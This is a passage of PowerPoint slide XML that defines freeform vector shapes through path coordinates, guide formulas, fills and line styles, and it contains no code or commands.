                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36106" name="Freeform 239"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2462" y="2673"/>
                <a:ext cx="96" cy="74"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 96"/>
                  <a:gd name="T1" fmla="*/ 69 h 74"/>
                  <a:gd name="T2" fmla="*/ 32 w 96"/>
                  <a:gd name="T3" fmla="*/ 72 h 74"/>
                  <a:gd name="T4" fmla="*/ 23 w 96"/>
                  <a:gd name="T5" fmla="*/ 73 h 74"/>
                  <a:gd name="T6" fmla="*/ 14 w 96"/>
                  <a:gd name="T7" fmla="*/ 74 h 74"/>
                  <a:gd name="T8" fmla="*/ 12 w 96"/>
                  <a:gd name="T9" fmla="*/ 72 h 74"/>
                  <a:gd name="T10" fmla="*/ 12 w 96"/>
                  <a:gd name="T11" fmla="*/ 66 h 74"/>
                  <a:gd name="T12" fmla="*/ 11 w 96"/>
                  <a:gd name="T13" fmla="*/ 61 h 74"/>
                  <a:gd name="T14" fmla="*/ 23 w 96"/>
                  <a:gd name="T15" fmla="*/ 61 h 74"/>
                  <a:gd name="T16" fmla="*/ 24 w 96"/>
                  <a:gd name="T17" fmla="*/ 57 h 74"/>
                  <a:gd name="T18" fmla="*/ 28 w 96"/>
                  <a:gd name="T19" fmla="*/ 57 h 74"/>
                  <a:gd name="T20" fmla="*/ 32 w 96"/>
                  <a:gd name="T21" fmla="*/ 57 h 74"/>
                  <a:gd name="T22" fmla="*/ 33 w 96"/>
                  <a:gd name="T23" fmla="*/ 54 h 74"/>
                  <a:gd name="T24" fmla="*/ 34 w 96"/>
                  <a:gd name="T25" fmla="*/ 54 h 74"/>
                  <a:gd name="T26" fmla="*/ 37 w 96"/>
                  <a:gd name="T27" fmla="*/ 56 h 74"/>
                  <a:gd name="T28" fmla="*/ 40 w 96"/>
                  <a:gd name="T29" fmla="*/ 57 h 74"/>
                  <a:gd name="T30" fmla="*/ 42 w 96"/>
                  <a:gd name="T31" fmla="*/ 57 h 74"/>
                  <a:gd name="T32" fmla="*/ 46 w 96"/>
                  <a:gd name="T33" fmla="*/ 59 h 74"/>
                  <a:gd name="T34" fmla="*/ 50 w 96"/>
                  <a:gd name="T35" fmla="*/ 59 h 74"/>
                  <a:gd name="T36" fmla="*/ 54 w 96"/>
                  <a:gd name="T37" fmla="*/ 58 h 74"/>
                  <a:gd name="T38" fmla="*/ 55 w 96"/>
                  <a:gd name="T39" fmla="*/ 56 h 74"/>
                  <a:gd name="T40" fmla="*/ 52 w 96"/>
                  <a:gd name="T41" fmla="*/ 54 h 74"/>
                  <a:gd name="T42" fmla="*/ 49 w 96"/>
                  <a:gd name="T43" fmla="*/ 55 h 74"/>
                  <a:gd name="T44" fmla="*/ 46 w 96"/>
                  <a:gd name="T45" fmla="*/ 56 h 74"/>
                  <a:gd name="T46" fmla="*/ 44 w 96"/>
                  <a:gd name="T47" fmla="*/ 53 h 74"/>
                  <a:gd name="T48" fmla="*/ 41 w 96"/>
                  <a:gd name="T49" fmla="*/ 52 h 74"/>
                  <a:gd name="T50" fmla="*/ 39 w 96"/>
                  <a:gd name="T51" fmla="*/ 52 h 74"/>
                  <a:gd name="T52" fmla="*/ 37 w 96"/>
                  <a:gd name="T53" fmla="*/ 50 h 74"/>
                  <a:gd name="T54" fmla="*/ 35 w 96"/>
                  <a:gd name="T55" fmla="*/ 50 h 74"/>
                  <a:gd name="T56" fmla="*/ 31 w 96"/>
                  <a:gd name="T57" fmla="*/ 50 h 74"/>
                  <a:gd name="T58" fmla="*/ 28 w 96"/>
                  <a:gd name="T59" fmla="*/ 51 h 74"/>
                  <a:gd name="T60" fmla="*/ 16 w 96"/>
                  <a:gd name="T61" fmla="*/ 54 h 74"/>
                  <a:gd name="T62" fmla="*/ 16 w 96"/>
                  <a:gd name="T63" fmla="*/ 51 h 74"/>
                  <a:gd name="T64" fmla="*/ 13 w 96"/>
                  <a:gd name="T65" fmla="*/ 48 h 74"/>
                  <a:gd name="T66" fmla="*/ 9 w 96"/>
                  <a:gd name="T67" fmla="*/ 41 h 74"/>
                  <a:gd name="T68" fmla="*/ 4 w 96"/>
                  <a:gd name="T69" fmla="*/ 35 h 74"/>
                  <a:gd name="T70" fmla="*/ 4 w 96"/>
                  <a:gd name="T71" fmla="*/ 31 h 74"/>
                  <a:gd name="T72" fmla="*/ 14 w 96"/>
                  <a:gd name="T73" fmla="*/ 18 h 74"/>
                  <a:gd name="T74" fmla="*/ 17 w 96"/>
                  <a:gd name="T75" fmla="*/ 6 h 74"/>
                  <a:gd name="T76" fmla="*/ 33 w 96"/>
                  <a:gd name="T77" fmla="*/ 1 h 74"/>
                  <a:gd name="T78" fmla="*/ 46 w 96"/>
                  <a:gd name="T79" fmla="*/ 1 h 74"/>
                  <a:gd name="T80" fmla="*/ 55 w 96"/>
                  <a:gd name="T81" fmla="*/ 6 h 74"/>
                  <a:gd name="T82" fmla="*/ 64 w 96"/>
                  <a:gd name="T83" fmla="*/ 9 h 74"/>
                  <a:gd name="T84" fmla="*/ 67 w 96"/>
                  <a:gd name="T85" fmla="*/ 11 h 74"/>
                  <a:gd name="T86" fmla="*/ 73 w 96"/>
                  <a:gd name="T87" fmla="*/ 22 h 74"/>
                  <a:gd name="T88" fmla="*/ 88 w 96"/>
                  <a:gd name="T89" fmla="*/ 33 h 74"/>
                  <a:gd name="T90" fmla="*/ 84 w 96"/>
                  <a:gd name="T91" fmla="*/ 39 h 74"/>
                  <a:gd name="T92" fmla="*/ 87 w 96"/>
                  <a:gd name="T93" fmla="*/ 52 h 74"/>
                  <a:gd name="T94" fmla="*/ 90 w 96"/>
                  <a:gd name="T95" fmla="*/ 57 h 74"/>
                  <a:gd name="T96" fmla="*/ 96 w 96"/>
                  <a:gd name="T97" fmla="*/ 61 h 74"/>
                  <a:gd name="T98" fmla="*/ 96 w 96"/>
                  <a:gd name="T99" fmla="*/ 72 h 74"/>
                  <a:gd name="T100" fmla="*/ 95 w 96"/>
                  <a:gd name="T101" fmla="*/ 72 h 74"/>
                  <a:gd name="T102" fmla="*/ 83 w 96"/>
                  <a:gd name="T103" fmla="*/ 74 h 74"/>
                  <a:gd name="T104" fmla="*/ 74 w 96"/>
                  <a:gd name="T105" fmla="*/ 72 h 74"/>
                  <a:gd name="T106" fmla="*/ 60 w 96"/>
                  <a:gd name="T107" fmla="*/ 69 h 74"/>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96"/>
                  <a:gd name="T163" fmla="*/ 0 h 74"/>
                  <a:gd name="T164" fmla="*/ 96 w 96"/>
                  <a:gd name="T165" fmla="*/ 74 h 74"/>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96" h="74">
                    <a:moveTo>
                      <a:pt x="60" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="43" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="69"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36107" name="Freeform 240"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2462" y="2673"/>
                <a:ext cx="96" cy="74"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 96"/>
                  <a:gd name="T1" fmla="*/ 69 h 74"/>
                  <a:gd name="T2" fmla="*/ 32 w 96"/>
                  <a:gd name="T3" fmla="*/ 72 h 74"/>
                  <a:gd name="T4" fmla="*/ 23 w 96"/>
                  <a:gd name="T5" fmla="*/ 73 h 74"/>
                  <a:gd name="T6" fmla="*/ 14 w 96"/>
                  <a:gd name="T7" fmla="*/ 74 h 74"/>
                  <a:gd name="T8" fmla="*/ 12 w 96"/>
                  <a:gd name="T9" fmla="*/ 72 h 74"/>
                  <a:gd name="T10" fmla="*/ 12 w 96"/>
                  <a:gd name="T11" fmla="*/ 66 h 74"/>
                  <a:gd name="T12" fmla="*/ 11 w 96"/>
                  <a:gd name="T13" fmla="*/ 61 h 74"/>
                  <a:gd name="T14" fmla="*/ 23 w 96"/>
                  <a:gd name="T15" fmla="*/ 61 h 74"/>
                  <a:gd name="T16" fmla="*/ 24 w 96"/>
                  <a:gd name="T17" fmla="*/ 57 h 74"/>
                  <a:gd name="T18" fmla="*/ 28 w 96"/>
                  <a:gd name="T19" fmla="*/ 57 h 74"/>
                  <a:gd name="T20" fmla="*/ 32 w 96"/>
                  <a:gd name="T21" fmla="*/ 57 h 74"/>
                  <a:gd name="T22" fmla="*/ 33 w 96"/>
                  <a:gd name="T23" fmla="*/ 54 h 74"/>
                  <a:gd name="T24" fmla="*/ 34 w 96"/>
                  <a:gd name="T25" fmla="*/ 54 h 74"/>
                  <a:gd name="T26" fmla="*/ 37 w 96"/>
                  <a:gd name="T27" fmla="*/ 56 h 74"/>
                  <a:gd name="T28" fmla="*/ 40 w 96"/>
                  <a:gd name="T29" fmla="*/ 57 h 74"/>
                  <a:gd name="T30" fmla="*/ 42 w 96"/>
                  <a:gd name="T31" fmla="*/ 57 h 74"/>
                  <a:gd name="T32" fmla="*/ 46 w 96"/>
                  <a:gd name="T33" fmla="*/ 59 h 74"/>
                  <a:gd name="T34" fmla="*/ 50 w 96"/>
                  <a:gd name="T35" fmla="*/ 59 h 74"/>
                  <a:gd name="T36" fmla="*/ 54 w 96"/>
                  <a:gd name="T37" fmla="*/ 58 h 74"/>
                  <a:gd name="T38" fmla="*/ 55 w 96"/>
                  <a:gd name="T39" fmla="*/ 56 h 74"/>
                  <a:gd name="T40" fmla="*/ 52 w 96"/>
                  <a:gd name="T41" fmla="*/ 54 h 74"/>
                  <a:gd name="T42" fmla="*/ 49 w 96"/>
                  <a:gd name="T43" fmla="*/ 55 h 74"/>
                  <a:gd name="T44" fmla="*/ 46 w 96"/>
                  <a:gd name="T45" fmla="*/ 56 h 74"/>
                  <a:gd name="T46" fmla="*/ 44 w 96"/>
                  <a:gd name="T47" fmla="*/ 53 h 74"/>
                  <a:gd name="T48" fmla="*/ 41 w 96"/>
                  <a:gd name="T49" fmla="*/ 52 h 74"/>
                  <a:gd name="T50" fmla="*/ 39 w 96"/>
                  <a:gd name="T51" fmla="*/ 52 h 74"/>
                  <a:gd name="T52" fmla="*/ 37 w 96"/>
                  <a:gd name="T53" fmla="*/ 50 h 74"/>
                  <a:gd name="T54" fmla="*/ 35 w 96"/>
                  <a:gd name="T55" fmla="*/ 50 h 74"/>
                  <a:gd name="T56" fmla="*/ 31 w 96"/>
                  <a:gd name="T57" fmla="*/ 50 h 74"/>
                  <a:gd name="T58" fmla="*/ 28 w 96"/>
                  <a:gd name="T59" fmla="*/ 51 h 74"/>
                  <a:gd name="T60" fmla="*/ 16 w 96"/>
                  <a:gd name="T61" fmla="*/ 54 h 74"/>
                  <a:gd name="T62" fmla="*/ 16 w 96"/>
                  <a:gd name="T63" fmla="*/ 51 h 74"/>
                  <a:gd name="T64" fmla="*/ 13 w 96"/>
                  <a:gd name="T65" fmla="*/ 48 h 74"/>
                  <a:gd name="T66" fmla="*/ 9 w 96"/>
                  <a:gd name="T67" fmla="*/ 41 h 74"/>
                  <a:gd name="T68" fmla="*/ 4 w 96"/>
                  <a:gd name="T69" fmla="*/ 35 h 74"/>
                  <a:gd name="T70" fmla="*/ 4 w 96"/>
                  <a:gd name="T71" fmla="*/ 31 h 74"/>
                  <a:gd name="T72" fmla="*/ 14 w 96"/>
                  <a:gd name="T73" fmla="*/ 18 h 74"/>
                  <a:gd name="T74" fmla="*/ 17 w 96"/>
                  <a:gd name="T75" fmla="*/ 6 h 74"/>
                  <a:gd name="T76" fmla="*/ 33 w 96"/>
                  <a:gd name="T77" fmla="*/ 1 h 74"/>
                  <a:gd name="T78" fmla="*/ 46 w 96"/>
                  <a:gd name="T79" fmla="*/ 1 h 74"/>
                  <a:gd name="T80" fmla="*/ 55 w 96"/>
                  <a:gd name="T81" fmla="*/ 6 h 74"/>
                  <a:gd name="T82" fmla="*/ 64 w 96"/>
                  <a:gd name="T83" fmla="*/ 9 h 74"/>
                  <a:gd name="T84" fmla="*/ 67 w 96"/>
                  <a:gd name="T85" fmla="*/ 11 h 74"/>
                  <a:gd name="T86" fmla="*/ 73 w 96"/>
                  <a:gd name="T87" fmla="*/ 22 h 74"/>
                  <a:gd name="T88" fmla="*/ 88 w 96"/>
                  <a:gd name="T89" fmla="*/ 33 h 74"/>
                  <a:gd name="T90" fmla="*/ 84 w 96"/>
                  <a:gd name="T91" fmla="*/ 39 h 74"/>
                  <a:gd name="T92" fmla="*/ 87 w 96"/>
                  <a:gd name="T93" fmla="*/ 52 h 74"/>
                  <a:gd name="T94" fmla="*/ 90 w 96"/>
                  <a:gd name="T95" fmla="*/ 57 h 74"/>
                  <a:gd name="T96" fmla="*/ 96 w 96"/>
                  <a:gd name="T97" fmla="*/ 61 h 74"/>
                  <a:gd name="T98" fmla="*/ 96 w 96"/>
                  <a:gd name="T99" fmla="*/ 72 h 74"/>
                  <a:gd name="T100" fmla="*/ 95 w 96"/>
                  <a:gd name="T101" fmla="*/ 72 h 74"/>
                  <a:gd name="T102" fmla="*/ 83 w 96"/>
                  <a:gd name="T103" fmla="*/ 74 h 74"/>
                  <a:gd name="T104" fmla="*/ 74 w 96"/>
                  <a:gd name="T105" fmla="*/ 72 h 74"/>
                  <a:gd name="T106" fmla="*/ 60 w 96"/>
